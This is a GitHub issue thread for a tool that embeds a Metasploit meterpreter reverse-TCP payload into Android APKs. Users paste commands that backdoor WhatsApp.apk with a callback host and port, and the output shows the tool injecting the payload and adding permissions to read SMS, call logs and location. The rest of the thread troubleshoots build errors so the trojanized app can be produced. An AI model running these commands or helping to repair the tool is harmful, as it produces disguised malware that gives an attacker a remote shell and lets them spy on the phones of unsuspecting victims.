### ISSUE TITLE
Error Android SDK

### ISSUE THREAD

**Issue by duard** [xc0d3rz/metasploit-apk-embed-payload#4]
`duard@LoveTC:/opt/metasploit-framework/Apks/metasploit-apk-embed-payload$ cp ../WhatsApp.apk .
duard@LoveTC:/opt/metasploit-framework/Apks/metasploit-apk-embed-payload$ ruby apk-embed-payload.rb WhatsApp.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895

██╗  ██╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗
╚██╗██╔╝██╔════╝██╔═████╗██╔══██╗╚════██╗██╔══██╗╚══███╔╝
 ╚███╔╝ ██║     ██║██╔██║██║  ██║ █████╔╝██████╔╝  ███╔╝ 
 ██╔██╗ ██║     ████╔╝██║██║  ██║ ╚═══██╗██╔══██╗ ███╔╝  
██╔╝ ██╗╚██████╗╚██████╔╝██████╔╝██████╔╝██║  ██║███████╗
╚═╝  ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝  ╚═╝╚══════╝                                  

[_] Authored by timwr, Jack64&Updated by xC0d3rZ.
sh: 1: /opt/metasploit-framework/Apks/metasploit-apk-embed-payload/embed_tools/apktool.sh: Permission denied
apk-embed-payload.rb:156:in `<main>': undefined method`include?' for nil:NilClass (NoMethodError)
duard@LoveTC:/opt/metasploit-framework/Apks/metasploit-apk-embed-payload$ chmod +x embed_tools/_.sh
duard@LoveTC:/opt/metasploit-framework/Apks/metasploit-apk-embed-payload$ ruby apk-embed-payload.rb WhatsApp.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895

██╗  ██╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗
╚██╗██╔╝██╔════╝██╔═████╗██╔══██╗╚════██╗██╔══██╗╚══███╔╝
 ╚███╔╝ ██║     ██║██╔██║██║  ██║ █████╔╝██████╔╝  ███╔╝ 
 ██╔██╗ ██║     ████╔╝██║██║  ██║ ╚═══██╗██╔══██╗ ███╔╝  
██╔╝ ██╗╚██████╗╚██████╔╝██████╔╝██████╔╝██║  ██║███████╗
╚═╝  ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝  ╚═╝╚══════╝                                  

[_] Authored by timwr, Jack64&Updated by xC0d3rZ.
[1] Generating msfvenom payload
[2] Signing payload
[3] Decompiling orignal APK
[4] Decompiling payload APK
[5] Locating onCreate() hook
[6] Copying payload files
[7] Loading Main.smali and injecting payload
[8] Poisoning the manifest with meterpreter permissions
[_] Adding android.permission.ACCESS_COURSE_LOCATION
[_] Adding android.permission.CALL_PHONE
[_] Adding android.permission.READ_SMS
[_] Adding android.permission.SET_WALLPAPER
[_] Adding android.permission.READ_CALL_LOG
[*] Adding android.permission.WRITE_CALL_LOG
[9] Rebuilding WhatsApp.apk with meterpreter injection as WhatsApp_backdoored.apk
[-] Error creating injection APK,If you haven't Android-SDK please install it.
`

![screenshot from 2016-08-09 00-36-23](https://cloud.githubusercontent.com/assets/36894/17503817/59df90c2-5dc9-11e6-94c1-36879a8abef9.png)

**Comment by 0vulns** [comment]
Hi,@duard.
**it seem to you're already had installed Android-SDK**,search for the file "WhatsApp_backdoored.apk" in tool forlder and tell me

**Comment by iven86** [comment]
hello 
[-] Error creating injection APK,If you haven't Android-SDK please install it.
how to fix this error and i install android studio on opt

**Comment by 0vulns** [comment]
@iven86,Can you take a screenshot ?

**Comment by 0vulns** [comment]
Hi,This issue due to an error in Rebuilding command.
See the line 231 on 96f9f82d23be18e6b3092b9a4c884b6f4fab7ed1 for more details.
Please download the new release [v0.1-beta](https://github.com/xc0d3rz/metasploit-apk-embed-payload/releases/tag/v0.1-beta).
Thanks.

**Comment by bahaaaldeenalrhwan** [comment]
what is the wrong here
1] Generating msfvenom payload 
[2] Signing payload 
[3] Decomposing original APK 
[4] Decomposing payload APK 
[5] Locating onCreate() hook 
[!] Unable to find correct hook automatically [_] 
Please choose from one of the following: 
[_] 
Hook:

**Comment by bahaaaldeenalrhwan** [comment]
after i press enter give me
[6] Copying payload files
[7] Loading  and injecting payload
lib/embed-payload.rb:241:in `initialize': No such file or directory @ rb_sysopen -  (Errno::ENOENT)
    from lib/embed-payload.rb:241:in`open'
    from lib/embed-payload.rb:241:in `embeddingPayload'
    from lib/embed-payload.rb:11:in`initialize'
    from apk-embed-payload.rb:30:in `new'
    from apk-embed-payload.rb:30:in`<main>'
